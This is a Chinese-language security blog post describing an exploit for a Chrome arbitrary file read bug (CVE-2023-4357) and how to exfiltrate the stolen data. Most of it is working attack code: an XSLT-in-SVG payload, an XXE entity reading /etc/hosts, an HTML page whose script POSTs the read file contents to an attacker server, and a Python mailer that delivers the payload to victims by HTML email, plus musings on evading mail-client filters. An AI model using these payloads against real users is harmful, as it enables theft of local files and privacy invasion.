azraelxuemo's Studio.

Chrome任意文件读->外带

web
2023/11/17

https://bugs.chromium.org/p/chromium/issues/detail?id=1458911
对于微信、钉钉这种,受害者点击链接之后会只有自己会看到,但是我们看不到,那么有没有什么方法呢?
使用js把数据结果带出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<html>
	<body>
		<iframe id ="test" src="http://ip/js.svg" >
        </iframe>
        <script>
            window.onload = function(){
               var content =  window.top.document.getElementById("test").contentWindow.document;
               var httpRequest = new XMLHttpRequest();
var url = "http://ip:8000/";
httpRequest.open("POST", url, true);
httpRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
httpRequest.send(content);
}
            </script>
	</body>
</html>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

<xsl:template match="/">

  <svg width="1000%" height="1000%" version="1.1" xmlns="http://www.w3.org/2000/svg">
    <foreignObject class="node" font-size="18" width="100%" height="100%">
    <body xmlns="http://www.w3.org/1999/xhtml">
      <xmp><xsl:copy-of  select="document('http://ip/evil.php')"/></xmp>
    </body>
    </foreignObject>
  </svg>

  </xsl:template>
</xsl:stylesheet>
1
2
3
4
5
<?xml-stylesheet type="text/xml"?>
<!DOCTYPE p [
<!ENTITY hosts SYSTEM "file:///etc/hosts">
]> 
<p>&hosts;</p>

效果
截屏2023-11-17 15.59.25.png

奇思妙想

对于微信、钉钉这种需要用户去点击,那么能不能做到0click,邮件是个不错的选择
邮件也会用chrome内核去加载,同时邮件也支持html语言

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

def send_email(subject, message, from_email, to_email, password):
    # 创建邮件主体
    msg = MIMEMultipart()
    msg['From'] = from_email
    msg['To'] = to_email
    msg['Subject'] = subject

    # 添加邮件内容
    msg.attach(MIMEText(message, 'html'))

    # 发送邮件
    try:
        
        server = smtplib.SMTP('smtp.gmail.com', 587)  # 设置SMTP服务器地址和端口
        server.ehlo()
        server.starttls()  # 启用TLS加密
        server.login(from_email, password)  # 登录邮箱
        server.send_message(msg)  # 发送邮件
        server.quit()  # 退出服务器
        print("邮件发送成功")
    except Exception as e:
        print("邮件发送失败:", str(e))

# 设置发件人和收件人信息
from_email = ''
to_email = ''
password = ''

# 发送邮件
subject = '测试邮件'

message = """
<html>
	<body>
		<h1>asda</h1>
        <p>asda</p>
</form>
	</body>
</html>"""
send_email(subject, message, from_email, to_email, password)

image.png
image.png
这里好像过滤了iframe,meta,object,embed等字段,或者可能是白名单级制,我们能否利用其他完成payload加载呢

Author:azraelxuemo

Link:https://azraelxuemo.github.io/2023/11/17/CVE-2023-4357/

Publish date:November 17th 2023, 1:51:34 pm

Update date:November 18th 2023, 5:06:41 pm

License:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 奇思妙想
Total : 16
2023
云安全 pwn java web